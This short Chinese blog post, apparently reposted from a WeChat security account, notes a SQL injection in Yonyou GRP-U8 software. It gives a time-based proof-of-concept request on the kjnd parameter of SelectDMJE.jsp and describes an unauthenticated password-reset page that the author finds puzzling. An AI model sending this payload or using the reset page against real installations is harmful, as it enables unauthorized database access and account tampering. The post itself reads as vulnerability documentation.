这些SQL注入都一个套路没意思，简单做下记录

关于用友GRP-U8内控管理软件存在SQL(u8qxSelectDMJE.jsp)注入漏洞的安全通告

参数为kjnd，poc如下：

/u8qx/SelectDMJE.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27--%20q

我的疑问：

直接访问/u8qx/passwordUpdate.jsp会直接出现重置密码的页面，如下图：

填写密码。两次保证一致即可，点击下一步就会显示修改成功。

但是这是在干嘛？修改了谁的？还是说虚晃一枪只做个显示？我不理解。

原文始发于微信公众号（浪飒sec）：用友GRP-U8 我有个疑问